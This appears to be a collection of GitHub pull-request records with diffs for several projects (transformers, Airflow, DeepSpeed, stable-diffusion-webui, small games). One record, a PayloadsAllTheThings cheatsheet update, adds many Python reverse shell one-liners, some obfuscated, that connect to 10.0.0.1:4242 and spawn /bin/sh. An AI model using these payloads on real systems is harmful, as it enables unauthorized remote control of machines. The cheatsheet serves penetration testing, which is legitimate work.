+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(model.config.output_attentions, True)
self.assertEqual(model.config.output_hidden_states, False)
@@ -178,7 +187,7 @@ def test_attention_outputs(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
self.assertEqual(out_len + (2 if self.is_encoder_decoder else 1), len(outputs))
self.assertEqual(model.config.output_attentions, True)
self.assertEqual(model.config.output_hidden_states, True)
@@ -223,7 +232,7 @@ def _create_and_check_torchscript(self, config, inputs_dict):
model = model_class(config=configs_no_init)
model.to(torch_device)
model.eval()
- inputs = inputs_dict["input_ids"] # Let's keep only input_ids
+ inputs = self._prepare_for_class(inputs_dict, model_class)["input_ids"] # Let's keep only input_ids
try:
traced_gpt2 = torch.jit.trace(model, inputs)
@@ -286,7 +295,7 @@ def test_headmasking(self):
head_mask[0, 0] = 0
head_mask[-1, :-1] = 0
head_mask.requires_grad_(requires_grad=True)
- inputs = inputs_dict.copy()
+ inputs = self._prepare_for_class(inputs_dict, model_class).copy()
inputs["head_mask"] = head_mask
outputs = model(**inputs)
@@ -337,7 +346,7 @@ def test_head_pruning(self):
}
model.prune_heads(heads_to_prune)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
@@ -372,7 +381,7 @@ def test_head_pruning_save_load_from_pretrained(self):
model.to(torch_device)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], 1)
self.assertEqual(attentions[1].shape[-3], self.model_tester.num_attention_heads)
@@ -402,7 +411,7 @@ def test_head_pruning_save_load_from_config_init(self):
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], 1)
@@ -430,7 +439,7 @@ def test_head_pruning_integration(self):
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], self.model_tester.num_attention_heads - 1)
@@ -444,7 +453,7 @@ def test_head_pruning_integration(self):
model.to(torch_device)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], self.model_tester.num_attention_heads - 1)
@@ -456,7 +465,7 @@ def test_head_pruning_integration(self):
model.prune_heads(heads_to_prune)
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
attentions = outputs[-1]
self.assertEqual(attentions[0].shape[-3], self.model_tester.num_attention_heads - 1)
@@ -476,7 +485,7 @@ def test_hidden_states_output(self):
model.to(torch_device)
model.eval()
with torch.no_grad():
- outputs = model(**inputs_dict)
+ outputs = model(**self._prepare_for_class(inputs_dict, model_class))
hidden_states = outputs[-1]
self.assertEqual(model.config.output_attentions, False)
self.assertEqual(model.config.output_hidden_states, True)
@@ -517,7 +526,7 @@ def test_resize_tokens_embeddings(self):
# Check that it actually resizes the embeddings matrix
self.assertEqual(model_embed.weight.shape[0], cloned_embeddings.shape[0] + 10)
# Check that the model can still do a forward pass successfully (every parameter should be resized)
- model(**inputs_dict)
+ model(**self._prepare_for_class(inputs_dict, model_class))
# Check that resizing the token embeddings with a smaller vocab size decreases the model's vocab size
model_embed = model.resize_token_embeddings(model_vocab_size - 15)
@@ -528,7 +537,7 @@ def test_resize_tokens_embeddings(self):
# Check that the model can still do a forward pass successfully (every parameter should be resized)
# Input ids should be clamped to the maximum size of the vocabulary
inputs_dict["input_ids"].clamp_(max=model_vocab_size - 15 - 1)
- model(**inputs_dict)
+ model(**self._prepare_for_class(inputs_dict, model_class))
# Check that adding and removing tokens has not modified the first part of the embedding matrix.
models_equal = True
@@ -631,6 +640,8 @@ def test_inputs_embeds(self):
inputs_dict.pop("decoder_input_ids", None)
for model_class in self.all_model_classes:
+ if model_class in MODEL_FOR_MULTIPLE_CHOICE_MAPPING.values():
+ continue
model = model_class(config)
model.to(torch_device)
model.eval()
| It's a bit heavy but I didn't find another way to reshape the inputs when needed for the multiple choice model. With this, and skipping the input_embeds test when the model is a multiple choice one (current implementation requires `input_ids`), I manage to have the common tests passing for `BertForMultipleChoice`.
Let me know if you have other ideas! | https://api.github.com/repos/huggingface/transformers/pulls/4886 | 2020-06-09T21:43:22Z | 2020-06-10T12:10:21Z | 2020-06-10T12:10:21Z | 2020-07-19T04:06:44Z | 2,004 | huggingface/transformers | 12,136 |
Fix and enable test_retry_handling_job | diff --git a/tests/jobs/test_scheduler_job.py b/tests/jobs/test_scheduler_job.py
index 5e602c8f10b88..b2bbe34457789 100644
--- a/tests/jobs/test_scheduler_job.py
+++ b/tests/jobs/test_scheduler_job.py
@@ -3037,7 +3037,6 @@ def run_with_error(ti, ignore_ti_state=False):
ti.refresh_from_db()
assert ti.state == State.SUCCESS
- @pytest.mark.skip(reason="This test needs fixing. It's very wrong now and always fails")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
@@ -3046,9 +3045,11 @@ def test_retry_handling_job(self):
dag = self.dagbag.get_dag("test_retry_handling_job")
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
+ dag.sync_to_db()
- scheduler_job = Job(jobe_type=SchedulerJobRunner.job_type, heartrate=0)
- self.job_runner = SchedulerJobRunner(job=scheduler_job, dag_id=dag.dag_id, num_runs=1)
+ scheduler_job = Job(job_type=SchedulerJobRunner.job_type, heartrate=0)
+ self.job_runner = SchedulerJobRunner(job=scheduler_job, num_runs=1)
+ self.job_runner.processor_agent = mock.MagicMock()
run_job(scheduler_job, execute_callable=self.job_runner._execute)
session = settings.Session()
| Needed to resync DAG to db as the only DAG so that scheduler schedules it with num_runs=1
<!--
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing,
software distributed under the License is distributed on an
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
KIND, either express or implied. See the License for the
specific language governing permissions and limitations
under the License.
-->
<!--
Thank you for contributing! Please make sure that your code changes
are covered with tests. And in case of new features or big changes
remember to adjust the documentation.
Feel free to ping committers for the review!
In case of an existing issue, reference it using one of the following:
closes: #ISSUE
related: #ISSUE
How to write a good git commit message:
http://chris.beams.io/posts/git-commit/
-->
<!-- Please keep an empty line above the dashes. -->
---
**^ Add meaningful description above**
Read the **[Pull Request Guidelines](https://github.com/apache/airflow/blob/main/CONTRIBUTING.rst#pull-request-guidelines)** for more information.
In case of fundamental code changes, an Airflow Improvement Proposal ([AIP](https://cwiki.apache.org/confluence/display/AIRFLOW/Airflow+Improvement+Proposals)) is needed.
In case of a new dependency, check compliance with the [ASF 3rd Party License Policy](https://www.apache.org/legal/resolved.html#category-x).
In case of backwards incompatible changes please leave a note in a newsfragment file, named `{pr_number}.significant.rst` or `{issue_number}.significant.rst`, in [newsfragments](https://github.com/apache/airflow/tree/main/newsfragments).
| https://api.github.com/repos/apache/airflow/pulls/34326 | 2023-09-13T07:12:31Z | 2023-09-14T10:03:46Z | 2023-09-14T10:03:46Z | 2023-10-29T21:52:28Z | 326 | apache/airflow | 14,760 |
MoE read the docs update | diff --git a/deepspeed/moe/layer.py b/deepspeed/moe/layer.py
index 6bc4c782cfc8..a0fb5989d00e 100644
--- a/deepspeed/moe/layer.py
+++ b/deepspeed/moe/layer.py
@@ -16,9 +16,6 @@
class MoE(torch.nn.Module):
- '''
- DeepSpeed MOE API: This defines a simple API that can be used from client-side code.
- '''
def __init__(self,
hidden_size,
expert,
@@ -30,10 +27,9 @@ def __init__(self,
min_capacity=4,
noisy_gate_policy: typing.Optional[str] = None):
"""Initialize an MoE layer.
- TODO: add details about input/output dimension assumptions
Arguments:
- hidden_size (int): the hidden dimension of the model.
+ hidden_size (int): the hidden dimension of the model, importantly this is also the input and output dimension.
expert (torch.nn.Module): the torch module that defines the expert (e.g., MLP, torch.linear).
@@ -81,15 +77,20 @@ def __init__(self,
self.dropout = torch.nn.Dropout(output_dropout_prob)
def forward(self, hidden_states, used_token=None):
- """
+ """ MoE forward
+
Arguments:
hidden_states (Tensor): input to the layer
used_token (Tensor, optional): default: None, mask only used tokens
Returns:
- output (Tensor): output of the model
- l_aux (Tensor): gate loss value
- exp_counts (int): expert count
+ A tuple including output, gate loss, and expert count.
+
+ * output (Tensor): output of the model
+
+ * l_aux (Tensor): gate loss value
+
+ * exp_counts (int): expert count
"""
output = self.deepspeed_moe(hidden_states, used_token)
output = self.dropout(output)
diff --git a/deepspeed/utils/groups.py b/deepspeed/utils/groups.py
index 2b1836cac889..dcd774d76501 100644
--- a/deepspeed/utils/groups.py
+++ b/deepspeed/utils/groups.py
@@ -69,10 +69,39 @@ def ensure_divisibility(numerator, denominator):
def initialize(ep_size=1, mpu=None):
- """ if mpu is provided, intialize groups using mpu.
- otherwise, we have two cases:
- 1. If called from DeepSpeed.initialize(), initialize groups with mp_size=1 and ep_size=1
- 2. If called from an application, initialize groups with mp_size=1 and ep_size=ep_size provided by the application
+ """
+ Process groups initialization supporting expert (E), data (D), and model (M) parallelism. DeepSpeed considers
+ the following scenarios w.r.t. process group creation.
+
+ * S1: There is no expert parallelism or model parallelism, only data (D)::
+
+ model = my_model(args)
+ engine = deepspeed.initialize(model) # initialize groups without mpu
+
+ * S2: There is expert parallelism but no model parallelism (E+D)::
+
+ deepspeed.utils.groups.initialize(ep_size) # groups will be initialized here
+ model = my_model(args)
+ engine = deepspeed.initialize(model)
+
+ * S3: There is model parallelism but no expert parallelism (M)::
+
+ mpu.init() # client initializes it's model parallel unit
+ model = my_model(args)
+ engine = deepspeed.initialize(model, mpu=mpu) # init w. mpu but ep_size = dp_world_size
+
+ * S4: There is model, data, and expert parallelism (E+D+M)::
+
+ mpu.init() # client initializes it's model parallel unit
+ deepspeed.utils.groups.initialize(ep_size, mpu) # initialize expert groups wrt mpu
+ model = my_model(args)
+ engine = deepspeed.initialize(model, mpu=mpu) # passing mpu is optional in this case
+
+ Arguments:
+ ep_size (int, optional): default=1, expert parallel size
+ mpu (module, optional): default=None, model parallel unit (e.g., from Megatron)
+ that descibes model/data parallel ranks.
+
"""
if mpu is not None:
log_dist(message="initializing deepspeed groups using mpu", ranks=[0])
diff --git a/docs/code-docs/source/index.rst b/docs/code-docs/source/index.rst
index 5175209cc1c4..7f5cd738acc6 100644
--- a/docs/code-docs/source/index.rst
+++ b/docs/code-docs/source/index.rst
@@ -42,7 +42,12 @@ ZeRO API
zero3
+Mixture of Experts (MoE)
+------------------------
+.. toctree::
+ :maxdepth: 2
+ moe
Transformer Kernel API
----------------------
diff --git a/docs/code-docs/source/moe.rst b/docs/code-docs/source/moe.rst
new file mode 100644
index 000000000000..21228c444b20
--- /dev/null
+++ b/docs/code-docs/source/moe.rst
@@ -0,0 +1,12 @@
+Mixture of Experts (MoE)
+====================
+
+Layer specification
+--------------------
+.. autoclass:: deepspeed.moe.layer.MoE
+ :members:
+
+
+Groups initialization
+--------
+.. autofunction:: deepspeed.utils.groups.initialize
| https://api.github.com/repos/microsoft/DeepSpeed/pulls/1312 | 2021-08-17T17:49:42Z | 2021-08-17T17:50:08Z | 2021-08-17T17:50:08Z | 2021-10-27T17:29:08Z | 1,263 | microsoft/DeepSpeed | 10,260 |
|
New/Updated Python Linux Reverse Shells | diff --git a/Methodology and Resources/Reverse Shell Cheatsheet.md b/Methodology and Resources/Reverse Shell Cheatsheet.md
index 108e70a16d..4dc4f2a58c 100644
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -95,19 +95,62 @@ IPv4
```python
export RHOST="10.0.0.1";export RPORT=4242;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'
```
+```python
+python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
+```
+```python
+python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
+```
+```python
+python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
+```
-IPv4
+IPv4 (No Spaces)
+```python
+python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
+```
+```python
+python -c 'socket=__import__("socket");subprocess=__import__("subprocess");os=__import__("os");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'
+```
+```python
+python -c 'socket=__import__("socket");subprocess=__import__("subprocess");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'
+```
+
+IPv4 (No Spaces, Shortened)
```python
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
+python -c 'a=__import__;s=a("socket");o=a("os").dup2;p=a("pty").spawn;c=s.socket(s.AF_INET,s.SOCK_STREAM);c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
+```
+```python
+python -c 'a=__import__;b=a("socket");p=a("subprocess").call;o=a("os").dup2;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
+```
+```python
+python -c 'a=__import__;b=a("socket");c=a("subprocess").call;s=b.socket(b.AF_INET,b.SOCK_STREAM);s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
+```
+
+IPv4 (No Spaces, Shortened Further)
+```python
+python -c 'a=__import__;s=a("socket").socket;o=a("os").dup2;p=a("pty").spawn;c=s();c.connect(("10.0.0.1",4242));f=c.fileno;o(f(),0);o(f(),1);o(f(),2);p("/bin/sh")'
+```
+```python
+python -c 'a=__import__;b=a("socket").socket;p=a("subprocess").call;o=a("os").dup2;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;o(f(),0);o(f(),1);o(f(),2);p(["/bin/sh","-i"])'
+```
+```python
+python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("10.0.0.1",4242));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'
```
IPv6
```python
-python -c 'import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn("/bin/sh");'
+python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
+```
+
+IPv6 (No Spaces)
+```python
+python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'
```
+IPv6 (No Spaces, Shortened)
```python
-python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
+python -c 'a=__import__;c=a("socket");o=a("os").dup2;p=a("pty").spawn;s=c.socket(c.AF_INET6,c.SOCK_STREAM);s.connect(("dead:beef:2::125c",4242,0,2));f=s.fileno;o(f(),0);o(f(),1);o(f(),,2);p("/bin/sh")'
```
Windows only
| -Revised existing Linux Python Reverse Shells
-Added New Linux Python Reverse Shells
| https://api.github.com/repos/swisskyrepo/PayloadsAllTheThings/pulls/399 | 2021-07-27T02:00:41Z | 2021-07-31T09:26:37Z | 2021-07-31T09:26:37Z | 2021-07-31T09:26:37Z | 1,711 | swisskyrepo/PayloadsAllTheThings | 8,630 |
rock_paper_scissor_game | diff --git a/rock_paper_scissor_game b/rock_paper_scissor_game
new file mode 100644
index 0000000000..565a06f73b
--- /dev/null
+++ b/rock_paper_scissor_game
@@ -0,0 +1,43 @@
+#let
+# 0 - rock
+# 1 - paper
+# 2 - scissor
+
+import random
+
+def name_to_number(name):
+ if name == "rock":
+ name = 0
+ elif name == "paper":
+ name = 1
+ elif name == "scissors":
+ name = 2
+ return name
+
+def number_to_name(number):
+ if number == 0:
+ return "rock"
+ elif number == 1:
+ return "paper"
+ elif number == 2:
+ return "scissors"
+
+def game(player_choice):
+ print
+ name = player_choice
+ print name
+ number = name_to_number(name)
+ comp_number = random.randrange(0,2)
+ comp_choice = number_to_name(comp_number)
+ print comp_choice
+
+ comp = -int(comp_number)
+ play = int(number)
+ diff = (comp + play)%5
+
+ if diff == 1 or diff == 3:
+ print "you won!!!"
+ elif diff == 0:
+ print "draw"
+ elif diff == 2 or diff == 4:
+ print "you lose!!!"
| https://api.github.com/repos/geekcomputers/Python/pulls/382 | 2018-10-03T12:39:17Z | 2018-10-03T19:19:58Z | 2018-10-03T19:19:58Z | 2018-10-03T19:20:02Z | 352 | geekcomputers/Python | 31,436 |
|
Updated Brushfire deadlink to proper repo | diff --git a/README.md b/README.md
index 90990f9e..45b20936 100644
--- a/README.md
+++ b/README.md
@@ -947,7 +947,7 @@ on MNIST digits[DEEP LEARNING]
#### General-Purpose Machine Learning
* [Conjecture](https://github.com/etsy/Conjecture) - Scalable Machine Learning in Scalding
-* [brushfire](https://github.com/avibryant/brushfire) - decision trees and random forests for scalding
+* [brushfire](https://github.com/stripe/brushfire) - Distributed decision tree ensemble learning in Scala
* [ganitha](https://github.com/tresata/ganitha) - scalding powered machine learning
* [adam](https://github.com/bigdatagenomics/adam) - A genomics processing engine and specialized file format built using Apache Avro, Apache Spark and Parquet. Apache 2 licensed.
* [bioscala](https://github.com/bioscala/bioscala) - Bioinformatics for the Scala programming language
| https://api.github.com/repos/josephmisiti/awesome-machine-learning/pulls/210 | 2015-12-09T16:49:50Z | 2015-12-09T16:50:40Z | 2015-12-09T16:50:40Z | 2015-12-09T16:50:43Z | 242 | josephmisiti/awesome-machine-learning | 52,101 |
|
Be more clear about Spandrel model nomenclature and types | diff --git a/extensions-builtin/SwinIR/scripts/swinir_model.py b/extensions-builtin/SwinIR/scripts/swinir_model.py
index aae159af56e..95c7ec648ef 100644
--- a/extensions-builtin/SwinIR/scripts/swinir_model.py
+++ b/extensions-builtin/SwinIR/scripts/swinir_model.py
@@ -71,7 +71,7 @@ def load_model(self, path, scale=4):
else:
filename = path
- model = modelloader.load_spandrel_model(
+ model_descriptor = modelloader.load_spandrel_model(
filename,
device=self._get_device(),
dtype=devices.dtype,
@@ -79,10 +79,10 @@ def load_model(self, path, scale=4):
)
if getattr(opts, 'SWIN_torch_compile', False):
try:
- model = torch.compile(model)
+ model_descriptor.model.compile()
except Exception:
logger.warning("Failed to compile SwinIR model, fallback to JIT", exc_info=True)
- return model
+ return model_descriptor
def _get_device(self):
return devices.get_device_for('swinir')
diff --git a/modules/gfpgan_model.py b/modules/gfpgan_model.py
index 48f8ad5e294..445b040925e 100644
--- a/modules/gfpgan_model.py
+++ b/modules/gfpgan_model.py
@@ -3,6 +3,8 @@
import logging
import os
+import torch
+
from modules import (
devices,
errors,
@@ -25,7 +27,7 @@ def name(self):
def get_device(self):
return devices.device_gfpgan
- def load_net(self) -> None:
+ def load_net(self) -> torch.Module:
for model_path in modelloader.load_models(
model_path=self.model_path,
model_url=model_url,
@@ -34,13 +36,13 @@ def load_net(self) -> None:
ext_filter=['.pth'],
):
if 'GFPGAN' in os.path.basename(model_path):
- net = modelloader.load_spandrel_model(
+ model = modelloader.load_spandrel_model(
model_path,
device=self.get_device(),
expected_architecture='GFPGAN',
).model
- net.different_w = True # see https://github.com/chaiNNer-org/spandrel/pull/81
- return net
+ model.different_w = True # see https://github.com/chaiNNer-org/spandrel/pull/81
+ return model
raise ValueError("No GFPGAN model found")
def restore(self, np_image):
diff --git a/modules/modelloader.py b/modules/modelloader.py
index 0b89d682c55..a7194137571 100644
--- a/modules/modelloader.py
+++ b/modules/modelloader.py
@@ -1,8 +1,9 @@
from __future__ import annotations
+import importlib
import logging
import os
-import importlib
+from typing import TYPE_CHECKING
from urllib.parse import urlparse
import torch
@@ -10,6 +11,8 @@
from modules import shared
from modules.upscaler import Upscaler, UpscalerLanczos, UpscalerNearest, UpscalerNone
+if TYPE_CHECKING:
+ import spandrel
logger = logging.getLogger(__name__)
@@ -140,19 +143,19 @@ def load_spandrel_model(
*,
device: str | torch.device | None,
half: bool = False,
- dtype: str | None = None,
+ dtype: str | torch.dtype | None = None,
expected_architecture: str | None = None,
-):
+) -> spandrel.ModelDescriptor:
import spandrel
- model = spandrel.ModelLoader(device=device).load_from_file(path)
- if expected_architecture and model.architecture != expected_architecture:
+ model_descriptor = spandrel.ModelLoader(device=device).load_from_file(path)
+ if expected_architecture and model_descriptor.architecture != expected_architecture:
logger.warning(
- f"Model {path!r} is not a {expected_architecture!r} model (got {model.architecture!r})",
+ f"Model {path!r} is not a {expected_architecture!r} model (got {model_descriptor.architecture!r})",
)
if half:
- model = model.model.half()
+ model_descriptor.model.half()
if dtype:
- model = model.model.to(dtype=dtype)
- model.eval()
- logger.debug("Loaded %s from %s (device=%s, half=%s, dtype=%s)", model, path, device, half, dtype)
- return model
+ model_descriptor.model.to(dtype=dtype)
+ model_descriptor.model.eval()
+ logger.debug("Loaded %s from %s (device=%s, half=%s, dtype=%s)", model_descriptor, path, device, half, dtype)
+ return model_descriptor
diff --git a/modules/realesrgan_model.py b/modules/realesrgan_model.py
index 65f2e880668..4d35b695c3b 100644
--- a/modules/realesrgan_model.py
+++ b/modules/realesrgan_model.py
@@ -36,14 +36,14 @@ def do_upscale(self, img, path):
errors.report(f"Unable to load RealESRGAN model {path}", exc_info=True)
return img
- mod = modelloader.load_spandrel_model(
+ model_descriptor = modelloader.load_spandrel_model(
info.local_data_path,
device=self.device,
half=(not cmd_opts.no_half and not cmd_opts.upcast_sampling),
expected_architecture="ESRGAN", # "RealESRGAN" isn't a specific thing for Spandrel
)
return upscale_with_model(
- mod,
+ model_descriptor,
img,
tile_size=opts.ESRGAN_tile,
tile_overlap=opts.ESRGAN_tile_overlap,
diff --git a/modules/upscaler_utils.py b/modules/upscaler_utils.py
index dde5d7ad43a..174c9bc3713 100644
--- a/modules/upscaler_utils.py
+++ b/modules/upscaler_utils.py
@@ -6,7 +6,7 @@
import tqdm
from PIL import Image
-from modules import devices, images
+from modules import images
logger = logging.getLogger(__name__)
| ## Description
Depending on the value of `half` and `dtype`, `load_spandrel_model` could have returned a `torch.Module` instead of a `spandrel.ModelDescriptor`. Now it's certain to only return a descriptor (and typed as such).
Follows up on 3be90740316f8fbb950b31d440458a5e8ed4beb3 8100e901ab0c5b04d289eebb722c8a653b8beef1 somewhat...
## Checklist:
- [ ] I have read [contributing wiki page](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing)
- [ ] I have performed a self-review of my own code
- [ ] My code follows the [style guidelines](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Contributing#code-style)
- [ ] My code passes [tests](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Tests)
| https://api.github.com/repos/AUTOMATIC1111/stable-diffusion-webui/pulls/14477 | 2023-12-30T22:11:53Z | 2023-12-30T22:38:44Z | 2023-12-30T22:38:44Z | 2023-12-30T22:38:44Z | 1,432 | AUTOMATIC1111/stable-diffusion-webui | 40,383 |
Added some cli board games | diff --git a/BoardGame-CLI/snakeLadder.py b/BoardGame-CLI/snakeLadder.py
new file mode 100644
index 0000000000..956f690d4b
--- /dev/null
+++ b/BoardGame-CLI/snakeLadder.py
@@ -0,0 +1,168 @@
+import random
+
+# Taking players data
+players = {} # stores players name their locations
+isReady = {}
+current_loc = 1 # vaiable for iterating location
+
+imp = True
+
+
+# players input function
+def player_input():
+ global players
+ global current_loc
+ global isReady
+
+ y = True
+ while y:
+ player_num = int(input("Enter the number of players: "))
+ if player_num > 0:
+ for i in range(player_num):
+ name = input(f"Enter player {i+1} name: ")
+ players[name] = current_loc
+ isReady[name] = False
+ y = False
+ play() # play funtion call
+
+ else:
+ print("Number of player cannot be zero")
+ print()
+
+
+# Dice roll method
+def roll():
+ # print(players)
+ return random.randrange(1, 7)
+
+
+# play method
+def play():
+ global players
+ global isReady
+ global imp
+
+ while imp:
+ print("/"*20)
+ print("1 -> roll the dice (or enter)")
+ print("2 -> start new game")
+ print("3 -> exit the game")
+ print("/"*20)
+
+ for i in players:
+ n = input("{}'s turn: ".format(i)) or 1
+ n = int(n)
+
+ if players[i] < 100:
+ if n == 1:
+ temp1 = roll()
+ print(f"you got {temp1}")
+ print("")
+
+ if isReady[i] == False and temp1 == 6:
+ isReady[i] = True
+
+ if isReady[i]:
+ looproll = temp1
+ while looproll == 6:
+ looproll = roll()
+ temp1 += looproll
+ print(f"you got {looproll} ")
+ print("")
+ # print(temp1)
+ if (players[i] + temp1) > 100:
+ pass
+ elif (players[i] + temp1) < 100:
+ players[i] += temp1
+ players[i] = move(players[i], i)
+ elif (players[i] + temp1) == 100:
+ print(f"congrats {i} you won !!!")
+ imp = False
+ return
+
+ print(f"you are at position {players[i]}")
+
+ elif n == 2:
+ players = {} # stores player ans their locations
+ isReady = {}
+ current_loc = 0 # vaiable for iterating location
+ player_input()
+
+ elif n == 3:
+ print("Bye Bye")
+ imp = False
+
+ else:
+ print("pls enter a valid input")
+
+
+# Move method
+def move(a, i):
+ global players
+ global imp
+ temp_loc = players[i]
+
+ if (temp_loc) < 100:
+ temp_loc = ladder(temp_loc, i)
+ temp_loc = snake(temp_loc, i)
+
+ return temp_loc
+
+
+# snake bite code
+def snake(c, i):
+ if (c == 32):
+ players[i] = 10
+ elif (c == 36):
+ players[i] = 6
+ elif (c == 48):
+ players[i] = 26
+ elif (c == 63):
+ players[i] = 18
+ elif (c == 88):
+ players[i] = 24
+ elif (c == 95):
+ players[i] = 56
+ elif (c == 97):
+ players[i] = 78
+ else:
+ return players[i]
+ print(f"You got bitten by a snake now you are at {players[i]}")
+
+ return players[i]
+
+
+# ladder code
+def ladder(a, i):
+ global players
+
+ if (a == 4):
+ players[i] = 14
+ elif (a == 8):
+ players[i] = 30
+ elif (a == 20):
+ players[i] = 38
+ elif (a == 40):
+ players[i] = 42
+ elif (a == 28):
+ players[i] = 76
+ elif (a == 50):
+ players[i] = 67
+ elif (a == 71):
+ players[i] = 92
+ elif (a == 88):
+ players[i] = 99
+ else:
+ return players[i]
+ print(f"You got a ladder now you are at {players[i]}")
+
+ return players[i]
+
+
+# while run:
+print("/"*40)
+print("Welcome to the snake ladder game !!!!!!!")
+print("/"*40)
+
+
+player_input()
diff --git a/BoardGame-CLI/uno.py b/BoardGame-CLI/uno.py
new file mode 100644
index 0000000000..4f36372a5f
--- /dev/null
+++ b/BoardGame-CLI/uno.py
@@ -0,0 +1,186 @@
+# uno game #
+
+import random
+"""
+Generate the UNO deck of 108 cards.
+Parameters: None
+Return values: deck=>list
+"""
+
+
+def buildDeck():
+ deck = []
+ # example card:Red 7,Green 8, Blue skip
+ colours = ["Red", "Green", "Yellow", "Blue"]
+ values = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, "Draw Two", "Skip", "Reverse"]
+ wilds = ["Wild", "Wild Draw Four"]
+ for colour in colours:
+ for value in values:
+ cardVal = "{} {}".format(colour, value)
+ deck.append(cardVal)
+ if value != 0:
+ deck.append(cardVal)
+ for i in range(4):
+ deck.append(wilds[0])
+ deck.append(wilds[1])
+ print(deck)
+ return deck
+
+
+"""
+Shuffles a list of items passed into it
+Parameters: deck=>list
+Return values: deck=>list
+"""
+
+
+def shuffleDeck(deck):
+ for cardPos in range(len(deck)):
+ randPos = random.randint(0, 107)
+ deck[cardPos], deck[randPos] = deck[randPos], deck[cardPos]
+ return deck
+
+
